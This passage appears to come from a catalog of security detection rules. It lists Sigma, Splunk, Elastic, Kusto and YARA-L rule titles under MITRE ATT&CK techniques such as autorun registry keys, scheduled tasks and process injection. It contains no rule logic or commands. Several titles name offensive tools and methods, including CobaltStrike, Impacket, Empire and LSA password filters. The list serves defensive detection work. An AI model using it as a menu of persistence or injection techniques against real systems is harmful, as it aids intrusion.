- Sigma Classes Autorun Keys Modification test
- Sigma Common Autorun Keys Modification test
- Sigma CurrentControlSet Autorun Keys Modification test
- YARA-L CurrentControlSet Autorun Keys Modification
- Sigma CurrentVersion Autorun Keys Modification test
- YARA-L CurrentVersion Autorun Keys Modification
- Sigma CurrentVersion NT Autorun Keys Modification test
- Sigma Direct Autorun Keys Modification test
- YARA-L Direct Autorun Keys Modification
- Splunk Execution from Startup Folder (Sysmon)
- Splunk Execution from Startup Folder (Windows Event Log)
- Elastic Execution of Persistent Suspicious Program production
- Sigma File Creation In Suspicious Directory By Msdt.EXE test
- Splunk File Written to Startup Folder - Windows (Sysmon)
- Splunk File Written to Startup Folder - Windows (Windows Event Log)
- Sigma Forest Blizzard APT - Custom Protocol Handler Creation test
- Sigma Forest Blizzard APT - Custom Protocol Handler DLL Registry Set test
- Sigma Internet Explorer Autorun Keys Modification test
- Sigma Kapeka Backdoor Autorun Persistence test
- Elastic Lateral Movement via Startup Folder production
- Sigma Leviathan Registry Key Activity test
- Sigma Modify User Shell Folders Startup Value test
- YARA-L Modify User Shell Folders Startup Value
- Sigma Narrator's Feedback-Hub Persistence test
- Splunk New AutoRun Registry Key (PowerShell)
- Sigma New RUN Key Pointing to Suspicious Folder experimental
- YARA-L New RUN Key Pointing to Suspicious Folder
- Sigma Office Autorun Keys Modification test
- Elastic Persistence via a Windows Installer production
- Elastic Persistence via Hidden Run Key Detected production
- Elastic Persistence via WMI Standard Registry Provider production
- Sigma Potential KamiKakaBot Activity - Winlogon Shell Persistence test
- Sigma Potential Persistence Attempt Via Run Keys Using Reg.EXE test
- Elastic Potential Persistence via Mandatory User Profile production
- Splunk Potential Proxy Malware via AutoRun Key (PowerShell)
- Splunk Potential Proxy Malware via AutoRun Key (Sysmon)
- Splunk Potential Proxy Malware via AutoRun Key (Windows Event Log)
- Elastic Potential REMCOS Trojan Execution production
- Sigma Potential Ryuk Ransomware Activity stable
- Sigma Potential Startup Shortcut Persistence Via PowerShell.EXE test
- Sigma Potential Suspicious Activity Using SeCEdit test
- YARA-L Potential Suspicious Activity Using SeCEdit
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Registry Keys Used For Persistence production
- Sigma Registry Persistence via Explorer Run Key test
- Kusto Registry Run Keys - Suspicious Registry Run Keys
- Sigma Registry Set With Crypto-Classes From The "Cryptography" PowerShell Namespace test
- Sigma Session Manager Autorun Keys Modification test
- YARA-L Session Manager Autorun Keys Modification
- Splunk Shortcut Created in Startup Folder - Windows (PowerShell)
- Sigma Startup Folder File Write test
- Splunk Startup Folder Location Modified - Windows (PowerShell)
- Splunk Startup Folder Location Modified - Windows (Sysmon)
- Splunk Startup Folder Location Modified - Windows (Windows Event Log)
- Elastic Startup Folder Persistence via Unsigned Process production
- Elastic Startup or Run Key Registry Modification production
- Sigma Suspicious Autorun Registry Modified via WMI experimental
- Sigma Suspicious PowerShell In Registry Run Keys test
- YARA-L Suspicious Powershell In Registry Run Keys
- Splunk Suspicious Registry Key Created (PowerShell)
- Splunk Suspicious Registry Key Created (Windows Event Log)
- Sigma Suspicious Run Key from Download test
- Sigma Suspicious Startup Folder Persistence test
- Elastic Suspicious Startup Shell Folder Modification production
- Sigma Suspicious VBScript UN2452 Pattern test
- Sigma System Scripts Autorun Keys Modification test
- Elastic Uncommon Registry Persistence Change production
- Sigma User Shell Folders Registry Modification via CommandLine experimental
- Sigma VBScript Payload Stored in Registry test
- Splunk Windows Boot or Logon Autostart Execution In Startup Folder production
- Sigma Windows Event Log Access Tampering Via Registry experimental
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows PowerShell MSIX Package Installation production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Registry Modification for Safe Mode Persistence production
- Sigma WinRAR Creating Files in Startup Locations experimental
- Sigma WinSock2 Autorun Keys Modification test
- Sigma Wow6432Node Classes Autorun Keys Modification test
- Splunk Wow6432Node Classes Autorun Keys Modification (PowerShell)
- Splunk Wow6432Node Classes Autorun Keys Modification (Sysmon)
- Splunk Wow6432Node Classes Autorun Keys Modification (Windows Event Log)
- Sigma Wow6432Node CurrentVersion Autorun Keys Modification test
- Sigma Wow6432Node Windows NT CurrentVersion Autorun Keys Modification test
Boot or Logon Autostart Execution: Authentication Package T1547.002 7 rules
- Splunk LSA Authentication Packages Registry Key Modified (PowerShell)
- Splunk LSA Authentication Packages Registry Key Modified (Sysmon)
- Splunk LSA Authentication Packages Registry Key Modified (Windows Event Log)
- Elastic Potential LSA Authentication Package Abuse production
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Sigma Potential Suspicious Activity Using SeCEdit test
Boot or Logon Autostart Execution: Time Providers T1547.003 3 rules
- Sigma New TimeProviders Registered With Uncommon DLL Name test
- Elastic Potential Persistence via Time Provider Modification production
- Splunk Time Provider Persistence Registry production
Boot or Logon Autostart Execution: Winlogon Helper DLL T1547.004 7 rules
- Elastic Persistence via WMI Standard Registry Provider production
- Splunk Unusual winlogon.exe Child Process (Sysmon)
- Splunk Unusual winlogon.exe Child Process (Windows Event Log)
- Sigma Winlogon Helper DLL test
- Sigma Winlogon Notify Key Logon Persistence test
- Splunk WinLogon Registry Key Modified (PowerShell)
- Splunk WinLogon Registry Key Modified (Sysmon)
Boot or Logon Autostart Execution: Security Support Provider T1547.005 5 rules
- Elastic Installation of Security Support Provider production
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Sigma Security Support Provider (SSP) Added to LSA Configuration test
- Elastic Suspicious Module Loaded by LSASS production
- Splunk Windows Security Support Provider Reg Query production
Boot or Logon Autostart Execution: Kernel Modules and Extensions T1547.006 2 rules
- Splunk Windows Snake Malware Kernel Driver Comadmin production
- Splunk Windows Snake Malware Service Create production
Boot or Logon Autostart Execution: LSASS Driver T1547.008 4 rules
- Sigma DLL Load via LSASS test
- Sigma Security package (SSP) added (Reg via command) experimental
- Sigma Security package (SSP) loaded into LSA (native) experimental
- Splunk Windows Autostart Execution LSASS Driver Registry Modification production
Boot or Logon Autostart Execution: Shortcut Modification T1547.009 10 rules
- Sigma Creation Exe for Service with Unquoted Path test
- Sigma Desktop.INI Created by Uncommon Process test
- Sigma New Custom Shim Database Created test
- Sigma NTFS hard link creation experimental
- Sigma NTFS symbolic link configuration change experimental
- Sigma NTFS symbolic link creation experimental
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Symbolic OR Hard File Link Created (PowerShell)
- Splunk Symbolic OR Hard File Link Created (Windows Event Log)
- Sigma Windows Network Access Suspicious desktop.ini Action test
Boot or Logon Autostart Execution: Port Monitors T1547.010 11 rules
- Sigma Add Port Monitor Persistence in Registry test
- Sigma Bypass UAC Using Event Viewer test
- Sigma Default RDP Port Changed to Non Standard Port test
- YARA-L Default RDP Port Changed to Non Standard Port
- Splunk Monitor Registry Keys for Print Monitors production
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Print spooler privilege escalation via printer added (CVE-2020-1048) experimental
- Splunk Rare dll called by Spoolsv.exe (Windows Event Log)
- Sigma SystemNightmare by GentilKiwi - External printer mapped (CVE-2021-1675 / CVE-2021-34527) experimental
- Sigma SystemNightmare by GentilKiwi - New external device added (CVE-2021-1675 / CVE-2021-34527) experimental
Boot or Logon Autostart Execution: Print Processors T1547.012 8 rules
- Elastic Potential Port Monitor or Print Processor Registration Abuse production
- Splunk Print Processor Registry Autostart production
- Splunk Print Spooler Adding A Printer Driver production
- Splunk Print Spooler Failed to Load a Plug-in production
- Splunk Spoolsv Spawning Rundll32 production
- Splunk Spoolsv Suspicious Loaded Modules production
- Splunk Spoolsv Writing a DLL production
- Splunk Spoolsv Writing a DLL - Sysmon production
Boot or Logon Autostart Execution: Active Setup T1547.014 4 rules
- Splunk Active Setup Registry Autostart production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Elastic Uncommon Registry Persistence Change production
- Splunk Windows Audit Policy Auditing Option Modified - Registry production
Compromise Host Software Binary T1554 15 rules
- Elastic Deprecated - Adobe Hijack Persistence production
- Sigma DNS HybridConnectionManager Service Bus test
- Splunk GitHub Workflow File Creation or Modification production
- Sigma HybridConnectionManager Service Installation test
- Kusto Potential Build Process Compromise
- Kusto Potential Build Process Compromise - MDE available
- Elastic Potential Masquerading as Browser Process production
- Elastic Potential Masquerading as Communication Apps production
- Elastic Potential Masquerading as System32 Executable production
- Elastic Potential Masquerading as VLC DLL production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Kusto SUNSPOT malware hashes available
- Elastic Suspicious Communication App Child Process production
- Elastic Suspicious Outlook Child Process production
Modify Authentication Process T1556 14 rules
- Sigma Directory Service Restore Mode(DSRM) Registry Value Tampering test
- Splunk Disabling Windows Local Security Authority Defences via Registry production
- Sigma Dropping Of Password Filter DLL test
- Elastic Network Logon Provider Registry Modification production
- Sigma Possible Shadow Credentials Added test
- Splunk Potential LSA password filter (PowerShell)
- Splunk Potential LSA password filter (Windows Event Log)
- Elastic Potential Shadow Credentials added to AD Object production
- Sigma Potential Suspicious Activity Using SeCEdit test
- Sigma Powershell Install a DLL in System Directory test
- Kusto Rouge RDP: Suspicious File Creation
- Splunk Suspicious Certificate Authentication (Windows Event Log)
- Splunk Suspicious Certificate Modification (Windows Event Log)
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Hybrid Identity T1556.007 1 rule
- Elastic Untrusted DLL Loaded by Azure AD Connect Authentication Agent production
Modify Authentication Process: Network Provider DLL T1556.008 1 rule
- Elastic Network Logon Provider Registry Modification production
Privilege Escalation
Boot or Logon Initialization Scripts T1037 10 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Elastic Startup/Logon Script added to Group Policy Object production
- Elastic Uncommon Registry Persistence Change production
- Sigma Uncommon Userinit Child Process test
Boot or Logon Initialization Scripts: Logon Script (Windows) T1037.001 8 rules
- Splunk Logon Script Event Trigger Execution production
- Splunk Logon Script Registry Key added (EDR)
- Splunk Logon Script Registry Key added (PowerShell)
- Splunk Logon Script Registry Key added (Sysmon)
- Splunk Logon Script Registry Key added (Windows Event Log)
- Sigma Potential Persistence Via Logon Scripts - CommandLine test
- Sigma Potential Persistence Via Logon Scripts - Registry test
- Sigma Uncommon Userinit Child Process test
Scheduled Task/Job T1053 133 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Kusto AV detections related to Tarrask malware available
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Defrag Deactivation - Security test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - CrackMapExec Execution test
- Sigma HackTool - CrackMapExec Execution Patterns stable
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Sigma HackTool - SharPersist Execution test
- Sigma HAFNIUM Exchange Exploitation Activity test
- Splunk Hidden Scheduled Task Created - Windows (Windows Event Log)
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive AT Job test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Splunk Schedule Task with HTTP Command Arguments production
- Splunk Schedule Task with Rundll32 Command Trigger production
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (PowerShell)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Sysmon)
- Splunk Scheduled Task with Potential SSH Tunnel - Windows (Windows Event Log)
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Elastic Scheduled Tasks AT Command Enabled production
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks Run Task On Demand production
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Scheduled Task Write to System32 Tasks test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows Hidden Schedule Task Settings production
- Splunk Windows Level RMM Watchdog Task Created production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task DLL Module Loaded production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Scheduled Tasks for CompMgmtLauncher or Eventvwr production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Scheduled Task/Job: At T1053.002 5 rules
- Elastic At.exe Command Lateral Movement production
- Sigma Interactive AT Job test
- Sigma Remote Task Creation via ATSVC Named Pipe test
- Splunk Scheduled Task Creation on Remote Endpoint using At production
- Elastic Scheduled Tasks AT Command Enabled production
Scheduled Task/Job: Scheduled Task T1053.005 111 rules
- Elastic A scheduled task was created production
- Elastic At.exe Command Lateral Movement production
- Sigma ChromeLoader Malware Execution test
- Splunk Create_Modify Schtasks (PowerShell)
- Splunk Create_Modify Schtasks (Sysmon)
- Splunk Create_Modify Schtasks (Windows Event Log)
- Sigma Defrag Deactivation test
- Sigma Diamond Sleet APT Scheduled Task Creation test
- Sigma Fortinet APT group abuse on Windows (task) experimental
- Sigma HackTool - Default PowerSploit/Empire Scheduled Task Creation test
- Splunk Impacket atexec.py Execution (PowerShell)
- Splunk Impacket atexec.py Execution (Sysmon)
- Splunk Impacket atexec.py Execution (Windows Event Log)
- Splunk Impacket atexec.py Scheduled Task Creation (Windows Event Log)
- Splunk Impacket atexec.py Temp File Creation (Sysmon)
- Splunk Impacket atexec.py Temp File Creation (Windows Event Log)
- Sigma Important Scheduled Task Deleted/Disabled test
- Sigma Interactive privileged shell triggered by schedule task (deprecated) experimental
- Sigma Kapeka Backdoor Persistence Activity test
- Sigma Kapeka Backdoor Scheduled Task Creation test
- Elastic Local Scheduled Task Creation production
- Sigma Massive remote schedule task creation via named pipes (CrackMapExec with ATexec) experimental
- YARA-L MITRE ATT&CK T1053.005 Windows Creation Of Scheduled Task
- Sigma OilRig APT Activity test
- Sigma OilRig APT Registry Persistence test
- Sigma OilRig APT Schedule Task Persistence - Security test
- Sigma OilRig APT Schedule Task Persistence - System test
- Sigma Operation Wocao Activity test
- Sigma Operation Wocao Activity - Security test
- Elastic Outbound Scheduled Task Activity via PowerShell production
- Sigma Persistence and Execution at Scale via GPO Scheduled Task test
- Elastic Persistence via a Windows Installer production
- Kusto Persistence Via Scheduled Tasks
- Elastic Persistence via TelemetryController Scheduled Task Hijack production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Sigma Potential ACTINIUM Persistence Activity test
- Sigma Potential BearLPE Exploitation test
- Sigma Potential Persistence Via Microsoft Compatibility Appraiser test
- Sigma Potential Persistence Via Powershell Search Order Hijacking - Task test
- Sigma Potential Registry Persistence Attempt Via Windows Telemetry test
- Sigma Potential SSH Tunnel Persistence Install Using A Scheduled Task experimental
- Sigma Powershell Create Scheduled Task test
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Randomly Generated Scheduled Task Name experimental
- Splunk Rare Schedule Task Created (Windows Event Log)
- Splunk Rare Scheduled Task (Windows Event Log)
- Sigma Remote schedule task creation via named pipes (ATexec) experimental
- Elastic Remote Scheduled Task Creation production
- Elastic Remote Scheduled Task Creation via RPC production
- Sigma Renamed Schtasks Execution experimental
- Sigma Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE test
- Sigma Scheduled persistent task with SYSTEM privileges creation experimental
- Sigma Scheduled Task Created - FileCreation test
- Sigma Scheduled Task Created - Registry test
- Sigma Scheduled task created and deleted fastly (ATexec.py) experimental
- Elastic Scheduled Task Created by a Windows Script production
- Sigma Scheduled Task Creation From Potential Suspicious Parent Location test
- Sigma Scheduled Task Creation Masquerading as System Processes experimental
- Sigma Scheduled Task Creation Via Schtasks.EXE test
- Sigma Scheduled task creation with command line experimental
- Sigma Scheduled Task Creation with Curl and PowerShell Execution Combo experimental
- Splunk Scheduled Task Deleted Or Created via CMD production
- Sigma Scheduled Task Deletion test
- Sigma Scheduled Task Executed From A Suspicious Location test
- Sigma Scheduled Task Executed Uncommon LOLBIN test
- Sigma Scheduled Task Executing Encoded Payload from Registry test
- Sigma Scheduled Task Executing Payload from Registry test
- Elastic Scheduled Task Execution at Scale via GPO production
- Splunk Scheduled Task Initiation on Remote Endpoint production
- Sigma Scheduled TaskCache Change by Uncommon Program test
- Sigma Schtasks Creation Or Modification With SYSTEM Privileges test
- Sigma Schtasks From Suspicious Folders test
- Splunk Schtasks scheduling job on remote system production
- Splunk Schtasks used for forcing a reboot production
- Sigma Serpent Backdoor Payload Execution Via Scheduled Task test
- Splunk Short Lived Scheduled Task production
- Sigma Suspicious Command Patterns In Scheduled Task Creation test
- Elastic Suspicious Execution via Scheduled Task production
- Sigma Suspicious Modification Of Scheduled Tasks test
- Sigma Suspicious Scheduled Task Creation test
- Sigma Suspicious Scheduled Task Creation Involving Temp Folder test
- Sigma Suspicious Scheduled Task Creation via Masqueraded XML File test
- Splunk Suspicious Scheduled Task from Public Directory production
- Sigma Suspicious Scheduled Task Name As GUID test
- Sigma Suspicious Scheduled Task Update test
- Sigma Suspicious Schtasks Execution AppData Folder test
- Sigma Suspicious Schtasks Schedule Type With High Privileges test
- Sigma Suspicious Schtasks Schedule Types test
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Svchost LOLBAS Execution Process Spawn production
- Sigma Task Scheduler DLL Loaded By Application Located In Potentially Suspicious Location test
- Elastic Temporarily Scheduled Task Creation production
- Sigma Turla Group Commands May 2020 test
- Elastic UAC Bypass via DiskCleanup Scheduled Task Hijack production
- Sigma Uncommon One Time Only Scheduled Task At 00:00 test
- Elastic Unusual Scheduled Task Update production
- Splunk Windows Compatibility Telemetry Suspicious Child Process production
- Splunk Windows Compatibility Telemetry Tampering Through Registry production
- Splunk Windows Enable Win32 ScheduledJob via Registry production
- Splunk Windows PowerShell ScheduleTask production
- Splunk Windows Registry Delete Task SD production
- Splunk Windows Scheduled Task Created in a Group Policy Object production
- Splunk Windows Scheduled Task Created Via XML production
- Splunk Windows Scheduled Task Service Spawned Shell production
- Splunk Windows Scheduled Task with Highest Privileges production
- Splunk Windows Scheduled Task with Suspicious Command production
- Splunk Windows Scheduled Task with Suspicious Name production
- Splunk Windows Schtasks Create Run As System production
- Splunk WinEvent Scheduled Task Created to Spawn Shell production
- Splunk WinEvent Scheduled Task Created Within Public Path production
- Splunk WinEvent Windows Task Scheduler Event Action Started production
Process Injection T1055 125 rules
- Kusto ADWS Connection from Process Injection Target
- Sigma APT PRIVATELOG Image Load Pattern test
- Sigma CobaltStrike Named Pipe test
- Sigma CobaltStrike Named Pipe Pattern Regex test
- Sigma CobaltStrike Named Pipe Patterns test
- Elastic Conhost Spawned By Suspicious Parent Process production
- Splunk Create Remote Thread In Shell Application production
- Sigma Created Files by Microsoft Sync Center test
- Sigma CreateRemoteThread API and LoadLibrary test
- Splunk DLLHost with no Command Line Arguments with Network production
- Sigma Dllhost.EXE Execution Anomaly test
- Sigma DotNet CLR DLL Loaded By Scripting Applications test
- Splunk GPUpdate with no Command Line Arguments with Network production
- Sigma HackTool - CACTUSTORCH Remote Thread Creation test
- Sigma HackTool - CoercedPotato Execution test
- Sigma HackTool - CoercedPotato Named Pipe Creation test
- Sigma HackTool - DInjector PowerShell Cradle Execution test
- Sigma HackTool - EfsPotato Named Pipe Creation test
- Sigma HackTool - HollowReaper Execution experimental
- Sigma HackTool - LittleCorporal Generated Maldoc Injection test
- Sigma HackTool - Potential CobaltStrike Process Injection test
- Sigma Injected Browser Process Spawning Rundll32 - GuLoader Activity test
- Splunk Known Process Injection Commands (PowerShell)
- Splunk Known Process Injection Commands (Sysmon)
- Splunk Known Process Injection Commands (Windows Event Log)
- Splunk Loading Of Dynwrapx Module production
- Sigma Lummac Stealer Activity - Execution Of More.com And Vbc.exe experimental
- Sigma Malicious Named Pipe Created test
- Sigma Malware Shellcode in Verclsid Target Process test
- Sigma ManageEngine Endpoint Central Dctask64.EXE Potential Abuse test
- Splunk Mavinject Execution (EDR)
- Splunk Mavinject Execution (Sysmon)
- Splunk Mavinject Execution (Windows Event Log)
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Microsoft Sync Center Suspicious Network Connections test
- Splunk Named Pipe Created (Sysmon)
- Sigma Network Connection Initiated Via Notepad.EXE test
- Splunk Notepad with no Command Line Arguments production
- Splunk Potential CVE-2023-23397 (EDR)
- Splunk Potential CVE-2023-23397 (Sysmon)
- Splunk Potential CVE-2023-23397 (Windows Event Log)
- Sigma Potential DLL Injection Or Execution Using Tracker.exe test
- Sigma Potential DLL Sideloading Using Coregen.exe test
- Sigma Potential Dridex Activity stable
- Sigma Potential Executable Run Itself As Sacrificial Process experimental
- Sigma Potential Pikabot Hollowing Activity test
- Sigma Potential Process Hollowing Activity test
- Elastic Potential Process Injection from Malicious Document production
- Sigma Potential Process Injection Via Msra.EXE test
- Sigma Potential Shellcode Injection test
- Splunk Powershell DLL_EXE Injection (PowerShell)
- Kusto Powershell Empire Cmdlets Executed in Command Line available
- Splunk Powershell Fileless Process Injection via GetProcAddress production
- Splunk PowerShell PInvoke Process Injection API Chain production
- Splunk Powershell Remote Thread To Known Windows Process production
- Sigma PowerShell ShellCode test
- Sigma Process Creation Using Sysnative Folder test
- Splunk Process Executed with Null Command Line (Sysmon)
- Splunk Process Executed with Null Command Line (Windows Event Log)
- Elastic Process Injection by the Microsoft Build Engine production
- Kusto Process Injection From Untrusted Process
- Kusto Process Injection Initiated By MMC
- Splunk Rare Remote Thread (Sysmon)
- Sigma Rare Remote Thread Creation By Uncommon Source Image test
- Sigma RedSun - Named Pipe Created experimental
- Sigma RedSun - TieringEngineService.exe Detected as EICAR Test File experimental
- Splunk Remote Thread Created by Uncommon Process (Sysmon)
- Sigma Remote Thread Created In Shell Application test
- Sigma Remote Thread Creation By Uncommon Source Image test
- Sigma Remote Thread Creation In Uncommon Target Image test
- Splunk Remote Thread from Suspicious Folder (Sysmon)
- Sigma Renamed Mavinject.EXE Execution test
- Sigma Renamed ZOHO Dctask64 Execution test
- Splunk Rundll32 Create Remote Thread To A Process production
- Splunk Rundll32 CreateRemoteThread In Browser production
- Splunk SearchProtocolHost with no Command Line with Network production
- Kusto Solorigate Named Pipe
- Sigma Suspect Svchost Activity test
- Splunk Suspicious Child Process for lsass.exe (Sysmon)
- Splunk Suspicious Child Process for lsass.exe (Windows Event Log)
- Sigma Suspicious Child Process Of Wermgr.EXE test
- Elastic Suspicious Communication App Child Process production
- Splunk Suspicious DLLHost no Command Line Arguments production
- Elastic Suspicious Endpoint Security Parent Process production
- Splunk Suspicious GPUpdate no Command Line Arguments production
- Kusto Suspicious named pipes available
- Elastic Suspicious Outlook Child Process production
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Sysmon)
- Splunk Suspicious Parent Process for lsass.exe or services.exe (Windows Event Log)
- Splunk Suspicious Parent Process for spoolsv.exe (Sysmon)
- Splunk Suspicious Parent Process for spoolsv.exe (Windows Event Log)
- Elastic Suspicious Process Access via Direct System Call production
- Elastic Suspicious Process Creation CallTrace production
- Sigma Suspicious Rundll32 Invoking Inline VBScript test
- Splunk Suspicious SearchProtocolHost no Command Line Arguments production
- Sigma Suspicious Userinit Child Process test
- Elastic Suspicious Zoom Child Process production
- Sigma TAIDOOR RAT DLL Load test
- Splunk Trickbot Named Pipe production
- Sigma Uncommon Process Access Rights For Target Image test
- Sigma Uncommon Svchost Command Line Parameter experimental
- Splunk Unexpected Network Connection from System Process (Sysmon)
- Splunk Unexpected Network Connection from System Process (Windows Event Log)
- Elastic Unusual Child Process from a System Virtual Process production
- Elastic Unusual Parent-Child Relationship production
- Elastic Unusual Service Host Child Process - Childless Service production
- Splunk Unusual svchost Child Process (Sysmon)
- Splunk Unusual svchost Child Process (Windows Event Log)
- Splunk Windows List ENV Variables Via SET Command From Uncommon Parent production
- Splunk Windows Process Injection In Non-Service SearchIndexer production
- Splunk Windows Process Injection into Commonly Abused Processes production
- Splunk Windows Process Injection into Notepad production
- Splunk Windows Process Injection Of Wermgr to Known Browser production
- Splunk Windows Process Injection Remote Thread production
- Splunk Windows Process Injection Wermgr Child Process production
- Splunk Windows Process Injection With Public Source Path production
- Splunk Windows Process With NamedPipe CommandLine production
- Splunk Windows PUA Named Pipe production
- Splunk Windows Rasautou DLL Execution production
- Splunk Windows Remote Assistance Spawning Process production
- Splunk Windows RMM Named Pipe production
- Splunk Windows Suspicious C2 Named Pipe production
- Splunk Windows Suspicious Named Pipe production
- Splunk Winhlp32 Spawning a Process production
